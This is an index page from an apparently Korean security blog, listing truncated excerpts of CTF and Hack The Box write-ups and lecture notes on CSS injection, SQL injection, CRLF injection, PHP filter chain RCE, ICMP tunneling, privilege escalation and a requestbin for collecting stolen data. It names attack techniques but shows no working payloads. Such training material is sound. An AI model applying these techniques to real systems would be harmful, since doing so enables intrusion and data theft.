Ghidra๋Š” ๋‘ ๊ฐœ์˜ ์„œ๋กœ ๋‹ค๋ฅธ ๋ฐ”์ด๋„ˆ๋ฆฌ์˜ ์—ฐ์‚ฐ์ž๋ฅผ ํ‘œ์‹œํ•ด์ฃผ๊ณ  ํ†ตํ•ฉํ•˜๋Š” ๊ธฐ๋Šฅ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฒˆ์—๋Š” Diff View๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฐ”์ด๋„ˆ๋ฆฌ์˜ ์ฐจ์ด์ ์„ ์‰ฝ๊ฒŒ ๋ณด๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Program Difference Ghidra๋Š” ์„œ๋กœ ๋‹ค๋ฅธ ๋ฐ”์ด๋„ˆ๋ฆฌ์˜ ์—ฐ์‚ฐ์ž๋ฅผ ํ‘œ์‹œํ•˜๊ณ  ์—ฐ์‚ฐ์ž๋ฅผ ํ†ตํ•ฉํ•˜๋Š” Program Difference๊ฐ€ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. git...

IPA Data Decryption

์• ํ”Œ์Šคํ† ์–ด์—์„œ ์•ฑ์„ ๋‹ค์šด๋ฐ›์œผ๋ฉด ida๋กœ ๋ถ„์„์„ ํ•ด๋ณด๋ฉด ์•”ํ˜ธํ™” ๋˜์–ด์„œ ๋ถ„์„์ด ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๋ณตํ˜ธํ™”ํ•˜๋Š” ๋„๊ตฌ๋“ค๋„ ๋งŽ์ง€๋งŒ ์ˆ˜๋™์œผ๋กœ ๋ณตํ˜ธํ™” ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Letโ€™s go Step 1 ipa to local PC AppStore์—์„œ ๋‹ค์šด๋ฐ›์€ ipa ํŒŒ์ผ์„ ๋กœ์ปฌ PC๋กœ ์˜ฎ๊น๋‹ˆ๋‹ค. ida์—์„œ ipaํŒŒ์ผ์„ ์—ด์–ด๋ณด๋ฉด ์•”ํ˜ธํ™” ๋ฉ”์‹œ์ง€ ํ™•์ธ์ด ๊ฐ€๋Šฅ...

EX - CSS Injection

CSS Injection ์‹ค์Šต์„ ํ•ด๋ด…์‹œ๋‹ค.. Code Code๋Š” app.py, index.html ์ฝ”๋“œ๊ฐ€ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ์ฝ”๋“œ๋Š” ๋‹จ์ˆœํžˆ color ๋ณ€์ˆ˜๋ฅผ ๋ฐ›์•„ index.html์˜ h1 ํƒœ๊ทธ์˜ ์ƒ‰์ƒ์„ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค. index.html์—๋Š” input์œผ๋กœ api_key๊ฐ€ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. from flask import Flask, render_te...

CSS Injection

Dreamhack ๊ฐ•์˜๋ฅผ ํ†ตํ•ด CSS Injection์ด ๋ฌด์—‡์ธ์ง€ ์•Œ์•„๋ด…์‹œ๋‹ค. CSS Injection CSS Injection์€ XSS์™€ ๋น„์Šทํ•˜๊ฒŒ ์›น ํŽ˜์ด์ง€ ๋กœ๋”ฉ ์‹œ ์•…์˜์ ์ธ ๋ฌธ์ž์—ด์„ ์‚ฝ์ž…ํ•˜์—ฌ ์•…์˜์ ์ธ ๋™์ž‘์„ ์ด๋„๋Š” ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๊ฐ€ ์ž„์˜ CSS ์†์„ฑ์„ ์‚ฝ์ž…ํ•ด ์›น ํŽ˜์ด์ง€ UI๋ฅผ ๋ณ€์กฐ ํ•˜๊ฑฐ๋‚˜ CSS ์†์„ฑ์˜ ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ์„ ํ†ตํ•ด ์›น ํŽ˜์ด์ง€...

php filter chain RCE

์›Œ๊ฒŒ์ž„ ๋ฌธ์ œ๋ฅผ ํ’€๋‹ค๊ฐ€ ๋ฐœ๊ฒฌํ•œ PHP Filter chain ๊ณต๊ฒฉ์œผ๋กœ RCE๋ฅผ ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. What is php filter? php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of o...

XSS with Fileupload Name

ํŒŒ์ผ ์—…๋กœ๋“œ ํ›„ ๋‹ค์šด๋กœ๋“œ ๋ฐ›์„ ๋•Œ <a>๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ javascript๋ฅผ ํ†ตํ•ด ํŒŒ์ผ ์ด๋ฆ„๋ช…์œผ๋กœ ๋‹ค์šด๋กœ๋“œ ๋ฐ›์„ ์‹œ URL Encoding์„ ํ•˜์—ฌ XSS ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Source Code ๋จผ์ € flask ๊ธฐ๋ฐ˜์œผ๋กœ ๋งŒ๋“ค์–ด์ง„ ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ์•Œ์•„ ๋ด…์‹œ๋‹ค. upload ๊ธฐ๋Šฅ๊ณผ download ๊ธฐ๋Šฅ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. fro...

Cookie Security

๋“œ๋ฆผํ•ต ๊ฐ•์˜๋ฅผ ํ†ตํ•ด Cookie์˜ ๋ณด์•ˆ์„ค์ •์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Cookie Domain/Path ์•„๋ž˜์™€ ๊ฐ™์ด Cookie๊ฐ€ ์„ค์ •๋˜์—ˆ์„ ๋•Œ ์–ด๋–ป๊ฒŒ ๋˜๋Š”์ง€ ์•Œ์•„๋ด…์‹œ๋‹ค. Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Path=<cookie-...

Unicode Lower Case & Decomposition

์›Œ๊ฒŒ์ž„ ๋ฌธ์ œ๋ฅผ ํ’€๋‹ค๊ฐ€ ๋ฌธ์ž์—ด์„ ๊ฒ€์ฆ ๋กœ์ง ์šฐํšŒ์™€ ๊ด€๋ จํ•œ ์žฌ๋ฏธ์žˆ๋Š” ํŠธ๋ฆญ์ด ์žˆ์–ด ๊ธ€์„ ๋‚จ๊น๋‹ˆ๋‹ค. What is Unicode ์œ ๋‹ˆ์ฝ”๋“œ(Unicode)๋Š” ์ „ ์„ธ๊ณ„์˜ ๋ชจ๋“  ๋ฌธ์ž๋ฅผ ์ปดํ“จํ„ฐ์—์„œ ์ผ๊ด€๋˜๊ฒŒ ํ‘œํ˜„ํ•˜๊ณ  ๋‹ค๋ฃฐ ์ˆ˜ ์žˆ๋„๋ก ์„ค๊ณ„๋œ __๊ตญ์ œ ํ‘œ์ค€ ๋ฌธ์ž ์ธ์ฝ”๋”ฉ ์‹œ์Šคํ…œ__์ž…๋‹ˆ๋‹ค. Unicode์˜ ์ฃผ์š” ํŠน์ง• ๋ฒ”์œ„ : 0~0x10FFFF ๊นŒ์ง€์˜ 1...

CRLF Injection & HTTP Response Splitting

์ตœ๊ทผ CTF ๋ฌธ์ œ๋ฅผ ํ’€๋‹ค๊ฐ€ CRLF Injection์„ ํ†ตํ•ด HTTP Response Splitting์œผ๋กœ flag๋ฅผ ์ฐพ๋Š” ๋ฌธ์ œ๊ฐ€ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. ๊ฐœ๋… ์ดํ•ด๊ฐ€ ๋ถ€์กฑํ•œ๊ฑฐ ๊ฐ™์•„ ๊ธ€๋กœ ์ž‘์„ฑํ•˜๋ ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค. CRLF Injection CRLF Injection์€ Carriage Return๊ณผ Line Feed๋ฅผ Inject ํ•˜๋Š” ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค. Carr...

ICMP Tunneling by Python with Scapy v2

ICMP ํ„ฐ๋„๋ง ์„œ๋ฒ„์—์„œ ์ž๋™ํ™”๋กœ ๋ฐ›๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ ์—…๋ฐ์ดํŠธ๋ฅผ ์ง„ํ–‰ํ–ˆ์Šต๋‹ˆ๋‹ค. ์ด์ „์˜ ๋‚ด์šฉ์€ ICMP Tunneling 1ํŽธ์„ ์ฐธ๊ณ  ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค. ๋ชฉ์  ๋‚ด๋ถ€๋ง์—์„œ ๋…ผ๋ฆฌ์  ๋ง๋ถ„๋ฆฌ๊ฐ€ ๋˜์–ด์žˆ์–ด๋„ ๋‘ HOST๊ฐ„ ping์ด ๊ฐ€๋Šฅํ•  ๋•Œ ICMP Tunneling์œผ๋กœ ๋ฐ์ดํ„ฐ ์ „์†ก์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Send HOST์™€ Recieve HOST์—์„œ ํŒŒ์ด์ฌ ...

URL Check Automation

์—…๋ฌด๋ฅผ ํ•˜๋ฉด์„œ ์ž์‚ฐ๋งˆ๋‹ค ์ ‘๊ทผ ๋˜๋Š”์ง€ ํ™•์ธ์„ ํ•˜๊ธฐ ์œ„ํ•œ ์ž‘์—…์„ ์žˆ์–ด ์ด๋ฅผ ์ž๋™ํ™” ํ•˜๋Š” ์ฝ”๋“œ๋ฅผ ๋งŒ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค. ๊ตฌ์กฐ ๊ทธ๋ฆผ์œผ๋กœ ๊ทธ๋ ค๋ณธ ๋„์‹ํ™”์ž…๋‹ˆ๋‹ค. ์—‘์…€ ํŒŒ์ผ์—์„œ URL๊ณผ URL ์„œ๋น„์Šค ์ด๋ฆ„์„ ์ฝ์–ด์˜ต๋‹ˆ๋‹ค. ์ฝ์–ด์˜จ ๋ฐ์ดํ„ฐ๋ฅผ URL ์„œ๋น„์Šค๋ฅผ ๋”•์…”๋„ˆ๋ฆฌ์˜ ํ‚ค, URL์„ ๋”•์…”๋„ˆ๋ฆฌ์˜ ๊ฐ’์œผ๋กœ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. URL Request & Reply...

๊ธฐ๋“œ๋ผ Ghidra ์‹ค์ „ ๊ฐ€์ด๋“œ

๋ฆฌ๋ฒ„์Šค ์—”์ง€๋‹ˆ์–ด๋ง ๊ธฐ๋“œ๋ผ ์‹ค์ „๊ฐ€์ด๋“œ Chapter1 ๋ฆฌ๋ฒ„์Šค ์—”์ง€๋‹ˆ์–ด๋ง ์ž…๋ฌธ์„ ์ •๋ฆฌํ•ด๋ด…์‹œ๋‹ค. ๋””์Šค์–ด์…ˆ๋ธ”๊ณผ ๋””์ปดํŒŒ์ผ ๋””์Šค์–ด์…ˆ๋ธ” : ํ—ฅ์Šค์ฝ”๋“œ ์ƒํƒœ์—์„œ ์–ด์…ˆ๋ธ”๋ฆฌ ์–ธ์–ด(์ €์ˆ˜์ค€ ์–ธ์–ด) ๋กœ ๋ณ€ํ™˜ ํ•˜๋Š” ๊ฒƒ ๋””์ปดํŒŒ์ผ : ํ—ฅ์Šค์ฝ”๋“œ ์ƒํƒœ์—์„œ ๊ณ ์ˆ˜์ค€ ์–ธ์–ด๋กœ ๋ณ€ํ™˜ ํ•˜๋Š” ๊ฒƒ ํ”„๋กœ๊ทธ๋žจ ์‹คํ–‰ํŒŒ์ผ๊ณผ ํ•˜๋“œ์›จ์–ด CPU : ์ œ์–ด๋ถ€, ์—ฐ์‚ฐ๋ถ€, ๋ ˆ์ง€์Šคํ„ฐ๋กœ ๊ตฌ์„ฑ๋จ ์ œ์–ด...

Requestbin Development

์—…๋ฌด๋ฅผ ์ง„ํ–‰ํ•˜๋ฉด์„œ Data ํƒˆ์ทจ๊ฐ€ ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž์˜ ์„œ๋ฒ„๋กœ ๊ฐ€์ ธ์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์•„์ง ๋ถ€์กฑํ•˜๊ณ  ๋‹ค๋ฅธ ์ข‹์€ ๋„๊ตฌ๋“ค๋„ ๋งŽ์ง€๋งŒ ํ•˜๋‚˜์”ฉ ํ•ด๋ณด๋Š”๊ฒŒ ์ข‹์ง€์•Š๋‚˜๋ผ๋Š” ์ƒ๊ฐ์— ๊ฐœ๋ฐœ์„ ํ•ด๋ณด์•˜์Šต๋‹ˆ๋‹ค. requestbin? requestbin ์ด๋ž€ client๊ฐ€ ์š”์ฒญํ•˜๋Š” ์ •๋ณด๋ฅผ ๋ฐ›์•„์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๊ตฌํ˜„๋˜์–ด ์žˆ๋Š” ๊ธฐ์ˆ ๋“ค์ด ๋งŽ์ง€๋งŒ ์ €๋Š”...

SQL Injection Sleep() is Danger..

Sleep() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜์—ฌ SQLi ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ๋•Œ ์กฐ์‹ฌํ•ด์•ผ ํ•˜๋Š” ๋ถ€๋ถ„์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Time Based SQL Injection SLEEP ๋ชจ์˜ํ•ดํ‚น ์—…๋ฌด๋ฅผ ์ˆ˜ํ–‰ํ•  ๋•Œ Time Based SQL Injection์ด ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ sleep() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜์—ฌ ์‘๋‹ต ๊ฐ„์˜ ์ฐจ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ DB๋ฅผ ๋ฝ‘์•„์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ order b...

Hack The Box - Waiting

Hack The Box mobile ๋ฌธ์ œ์ธ Waiting ๋ฌธ์ œ๋ฅผ ํ’€์–ด๋ด…์‹œ๋‹ค. ์š”์ฆ˜ ๋ชจ๋ฐ”์ผ์„ ๋„ํ†ต ์•ˆํ•ด์„œ ๋‹ค๊นŒ๋จน์–ด์„œโ€ฆ ํฐ์ผ ๊ฐœ์š” ์ œ์ผ ๋จผ์ € Waiting ์•ฑ ์‹คํ–‰ ์‹œ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ๋ฐ”๋กœ ์•ฑ์ด ์ข…๋ฃŒ๋ฉ๋‹ˆ๋‹ค. ์ด ์•ฑ์€ ๋ชจ๋“  ์ข…๋ฅ˜์˜ ์‚ฌ์šฉ์ž๋ฅผ ์œ„ํ•œ ํ† ํฐ ๋˜๋Š” ๋น„๋ฐ€์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค. ์—…๋ฐ์ดํŠธ: ๋‹ค๋ฅธ ์•ฑ์˜ ์š”์ฒญ ํ† ํฐ์— ๋Œ€ํ•œ ์ผ...

regex

์›ํ•˜๋Š” ํŒจํ„ด์„ ์ฐพ์„ ๋•Œ regex(์ •๊ทœํ‘œํ˜„์‹)์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. python์—์„œ re ๋ชจ๋“ˆ์—์„œ ์ •๊ทœ์‹์„ ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. ๋ฉ”ํƒ€ ๋ฌธ์ž ์ •๊ทœํ‘œํ˜„์‹์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๋ฉ”ํƒ€ ๋ฌธ์ž๋“ค์˜ ์˜๋ฏธ๋ฅผ ์•Œ์•„๋ด…์‹œ๋‹ค. re ๋ชจ๋“ˆ reํŒŒ์ด์ฌ์—์„œ re๋ชจ๋“ˆ๋กœ ์ •๊ทœ์‹์„ ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ๋ ค์ค๋‹ˆ๋‹ค. ์ •๊ทœํ‘œํ˜„์‹ ์ปดํŒŒ์ผ ํŒŒ์ด์ฌ์—์„œ ์ •๊ทœํ‘œํ˜„์‹์„ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด ...

Hack The Box - LoveTok

Hack The Box LoveTok ๋ฌธ์ œ๋ฅผ ํ’€์–ด๋ด…์‹œ๋‹ค. Main Page ๋ฉ”์ธ ํŽ˜์ด์ง€๋Š” ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. format์„ ๋ณ€์ˆ˜๋ฅผ ์ž…๋ ฅ๋ฐ›์•„ ๋‚ ์งœ ๋น„์Šทํ•˜๊ฒŒ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ๊ธฐ๋Šฅ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. Vuln Point WEB ROOT ์ตœ์ƒ์˜ index.php๋ฅผ ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค. <?php $router = new Router();...

Hack The Box - Templated

Hack The Box Templated ๋ฌธ์ œ๋ฅผ ํ’€์–ด๋ด…์‹œ๋‹ค. Description Can you exploit this simple mistake? Solve ๋ฌธ์ œ ์›น ์‚ฌ์ดํŠธ์— ์ ‘๊ทผํ•˜๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค. Flask๋กœ ๋งŒ๋“ค์–ด์ง„ ์›น ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. URL์— test ์ž…๋ ฅ์‹œ test๋ผ๋Š” ๋ฌธ๊ตฌ๊ฐ€ ์ถœ๋ ฅ๋œ๋‹ค. SSTI ...

BabyEncryption

Hack The Box BabyEncryption ๋ฌธ์ œ๋ฅผ ํ’€์–ด ๋ด…์‹œ๋‹ค. CHALLENGE DESCRIPTION You are after an organised crime group which is responsible for the illegal weapon market in your country. As a secret agent, yo...

loose comparison

์ตœ๊ทผ์— โ€œ==โ€ ์œผ๋กœ ๋А์Šจํ•œ ๋น„๊ต๋ฅผ ํ•˜๋Š” ์›Œ๊ฒŒ์ž„ ๋ฌธ์ œ๋ฅผ ํ’€์—ˆ์Šต๋‹ˆ๋‹ค. ์ด์— ๋А์Šจํ•œ ๋น„๊ต๊ฐ€ ๋ฌด์—‡์ธ์ง€ ์ž์„ธํ•˜๊ฒŒ ์•Œ์•„๋ด…์‹œ๋‹ค. loose comparison(๋А์Šจํ•œ ๋น„๊ต) ๋А์Šจํ•œ ๋น„๊ต๋ž€ ๋ง ๊ทธ๋Œ€๋กœ ๋А์Šจํ•œ ๋น„๊ต์ž…๋‹ˆ๋‹ค. ์ฝ”๋“œ์—์„œ == ํ˜น์€ === ์œผ๋กœ ๋น„๊ตํ•˜๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ==์€ ๋А์Šจํ•œ ๋น„๊ต, ===์€ ์—„๊ฒฉํ•œ ๋น„๊ต๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ์™œ ์—„๊ฒฉํ•˜๊ณ ...

Spoofing MAC

์˜ค๋Š˜ MAC Address๋ฅผ ๊ฐ„๋‹จํ•˜๊ฒŒ ๋ณ€๊ฒฝ ํ•ด์ค„์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ๋ฅผ ์•Œ๊ฒŒ๋˜์—ˆ๋‹ค. ํ•ญ์ƒ ์ž˜ ์•Œ๋ ค์ฃผ์‹œ๋Š” ๋ถ„๋“ค์—๊ฒŒ ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค๐Ÿ‘๐Ÿ‘๐Ÿ‘๐Ÿ‘๐Ÿ‘ Spoofing MAC WIKI์— ๋”ฐ๋ฅด๋ฉด MAC Address๋ฅผ ๋ณ€๊ฒฝํ•˜๋Š” ๊ธฐ์ˆ ์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ NIC(Network Interface Controller)์—์„œ ํ•˜๋“œ์ฝ”๋”ฉ ๋œ MAC ์ฃผ์†Œ๋Š” ๋ณ€๊ฒฝ์ด ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค...

CVE-2022-25765 Vulnerability

Hack the Box Precious ๋ฌธ์ œ๋ฅผ ํ’€๋ฉด์„œ ๋ฐœ๊ฒฌ๋œ ์ทจ์•ฝ์  CVE-2022-25765 ๋ถ„์„์„ ํ•ด๋ด…์‹œ๋‹ค! ruby ์–ธ์–ด๋ฅผ ์ž˜๋ชฐ๋ผ ์ •ํ™•ํ•˜์ง€ ์•Š์„์ˆ˜ ์žˆ์Œ CVE-2022-25765 CVE mitre์— ๋”ฐ๋ฅด๋ฉด ํ•ด๋‹น ์ทจ์•ฝ์ ์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. The package pdfkit from 0.0.0 are vulnerable to ...

Privilige escalation with Path Injection

์ผ๋ฐ˜์ ์œผ๋กœ ์‰˜์„ ๋”ฐ๊ฒŒ ๋˜๋ฉด ROOT ๊ถŒํ•œ์ด ์•„๋‹ˆ๋‹ค. ๊ทธ๋ž˜์„œ ์ด๋Ÿฐ์ €๋Ÿฐ ์ œ์•ฝ์ด ๋งŽ๊ธฐ ๋•Œ๋ฌธ์— ROOT ๊ถŒํ•œ์ด๋‚˜ ์ƒ์œ„ ๊ถŒํ•œ์ด ํ•„์š”ํ•œ ๊ฒฝ์šฐ๊ฐ€ ์žˆ๋‹ค. ๊ถŒํ•œ์ƒ์Šน ์ทจ์•ฝ์  ์ค‘ ํ•˜๋‚˜์ธ Path Injection์„ ์•Œ์•„๋ณด์ž Privilige escalation? ๊ถŒํ•œ ์ƒ์Šน(Privilige escalation)์€ ์šด์˜ ์ฒด์ œ๋‚˜ ์†Œํ”„ํŠธ์›จ์–ด ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋ฒ„๊ทธ, ...

Hack The Box - Precious

Hack the Box Precious ๋ฌธ์ œ๋ฅผ ํ’€์–ด ๋ด…์‹œ๋‹ค. Port Scanning nmap ์Šค์บ๋‹ ๊ฒฐ๊ณผ๋ฅผ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. ssh ์„œ๋น„์Šค์™€ http ์„œ๋น„์Šค๊ฐ€ ์—ด๋ ค์žˆ์Šต๋‹ˆ๋‹ค. ssh์˜ ๊ณ„์ • ์ •๋ณด๋Š” ๋ชจ๋ฅด๊ธฐ ๋•Œ๋ฌธ์— http ์„œ๋น„์Šค์— ์ ‘์†ํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. hosts ํŒŒ์ผ์— precious.htb๋ฅผ ๋“ฑ๋กํ•˜๋ฉด ์›น ํŽ˜์ด์ง€์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ...

Reversing Dreamhack Helloworld

๋“œ๋ฆผํ•ต ๊ฐ•์˜๋ฅผ ํ†ตํ•ด Helloworld.exe๋ฅผ ๋ถ„์„์„ ํ•ด๋ด…์‹œ๋‹ค. Helloworld Code ๊ฐ„๋‹จํ•œ ์˜ˆ์ œ์ธ HelloWorld.exe๋ฅผ ๋ถ„์„ํ•ด๋ณด์ž ์†Œ์Šค ์ฝ”๋“œ๋Š” 1์ดˆ๋ฅผ ๋Œ€๊ธฐํ•˜๊ณ  Hello, world!๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ํ”„๋กœ๊ทธ๋žจ์ž…๋‹ˆ๋‹ค. #include <Windows.h> #include <stdio.h> char* st...

Hack The Box - Photobomb vulnerability analysis

Photobomb ๋ฌธ์ œ๋ฅผ ํ’€๋ฉด์„œ ๋‚˜์™”๋˜ ์ทจ์•ฝ์ ์„ ๋ถ„์„์„ ํ•ด๋ด…์‹œ๋‹ค. Flag๋ฅผ ์ฐพ๋Š” ๊ฒƒ๋„ ์ค‘์š”ํ•˜์ง€๋งŒ ์™œ ์ทจ์•ฝ์ ์ด ํ„ฐ์ง€๋Š”์ง€ ์›์ธ์„ ์•„๋Š” ๊ฒƒ์ด ๊ต‰์žฅํžˆ ์ค‘์š”ํ•˜๋‹ค๊ณ  ์ƒ๊ฐํ•ฉ๋‹ˆ๋‹ค.โ—๏ธโ—๏ธโ—๏ธ. Basic Authentication ์ฒซ๋ฒˆ์งธ๋กœ ๋ฐœ๊ฒฌ๋œ ์ทจ์•ฝ์ ์€ Baisc Authentication ์ •๋ณด๊ฐ€ ๋…ธ์ถœ๋˜์—ˆ๋˜ ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค. What is Basic...

Hack The Box - Photobomb

Hack the Box์˜ Photobomb์„ ํ’€์–ด๋ด…์‹œ๋‹ค. Port Scanning ์ œ์ผ ๋จผ์ € nmap์„ ์ด์šฉํ•˜์—ฌ ํฌํŠธ์Šค์บ”์„ ๋Œ๋ ธ์„ ๋•Œ ๋‚˜์˜ค๋Š” ๊ฒฐ๊ณผ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ํฌํŠธ๊ฐ€ ์—ด๋ ค์žˆ์œผ๋ฉฐ ssh ์—ฐ๊ฒฐ์€ ID์™€ ํŒจ์Šค์›Œ๋“œ๋ฅผ ๋ชจ๋ฅด๋‹ˆ http ๋ถ€ํ„ฐ ์ ‘๊ทผ์„ ์‹œ๋„ํ–ˆ๋‹ค. ssh http HTTP Service ๊ทธ๋ƒฅ ์ ‘๊ทผํ•˜๋ฉด ...

Hack The Box - Fawn

Hack the box ๊ธฐ์ดˆ์ค‘ Fawn์„ ํ’€์–ด๋ด…์‹œ๋‹ค Fawn Quiz ํ˜•์‹์˜ ๋ฌธ์ œ๋ฅผ ๋ณด๋ฉด FTP ๊ด€๋ จ ๋ฌธ์ œ๋“ค์ด๋‹ค. Nmap์„ ํ†ตํ•ด FTP ์„œ๋น„์Šค๊ฐ€ ์—ด๋ ค์žˆ๋Š” ๊ฒƒ์„ ํŒŒ์•…ํ•˜๊ณ  FTP ๋ฒ„์ „์ด๋ผ๋˜์ง€ ์ต๋ช…(Anonymous)FTP๋กœ ์ ‘๊ทผํ•˜์—ฌ Flag๋ฅผ ์ฐพ๋„๋ก ๋˜์–ด ์žˆ๋‹ค. Anonymous๋กœ FTP๋ฅผ ์ ‘๊ทผํ•˜์—ฌ flag.txt๋ฅผ ๋‹ค์šด๋กœ๋“œ ๋ฐ›์„ ์ˆ˜ ์žˆ๋‹ค...

How to Extract Dynamic DEX Loading

์ตœ๊ทผ ๋ชจ๋ฐ”์ผ ์ง„๋‹จ ์ค‘ ๋ฃจํŒ…ํƒ์ง€๋ฅผ ํ•˜๊ณ  ์žˆ์ง€๋งŒ ์–ด๋””์„œ ํ˜ธ์ถœํ•˜๋Š”์ง€๋ฅผ ์ฐพ์„ ์ˆ˜๊ฐ€ ์—†์—ˆ๋Š”๋ฐ ์–ด์ฐŒ์ €์ฐŒ ํ•˜๋‹ค๊ฐ€ Dynamic Dex Loading์ด ์ ์šฉ๋œ ๊ฒƒ์„ ๋ฐœ๊ฒฌ ํ•˜์˜€์Šต๋‹ˆ๋‹ค. Dynamic Dex Loading์„ ํ•˜๋Š” App์—์„œ DEX๋ฅผ ์ถ”์ถœํ•˜๋Š” ๋ฐฉ๋ฒ•๋“ค์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. Dynamic Dex Loading ๐Ÿ”ตโšช๏ธ๐Ÿ”ด Dynamic Dex Loa...

Frida TCP Hooking

TCP ํ†ต์‹ ์„ MITM Relay๊ฐ€ ์•„๋‹Œ Frida ํ›„ํ‚น์„ ํ†ตํ•ด ํŒจํ‚ท์„ ์žก์•„๋ด…์‹œ๋‹ค. ๊ฐœ์š” ์†Œ์ผ“ ํ†ต์‹ ์—์„œ C/C++ ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์€ ๋ฐ์ดํ„ฐ ์†ก์ˆ˜์‹  ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. send(), recv() sendto(), rectfrom() ํ•จ์ˆ˜ ์›ํ˜• ํ•จ์ˆ˜ ์›ํ˜•์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. send(int sockfd, co...

Error Based & Error based Blind SQL Injection

DreamHack ๊ฐ•์˜๋ฅผ ํ†ตํ•ด Error Based SQL Injection๊ณผ Error Based Blind SQL Injection์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. Error Based SQL Injection Dreamhack ๊ฐ•์˜๋ฅผ ํ†ตํ•ด Error Based SQL Injection์ด ๋ฌด์—‡์ธ์ง€ ์•Œ์•„๋ด…์‹œ๋‹ค. Error Based SQL I...

ICMP Tunneling by Python with Scapy

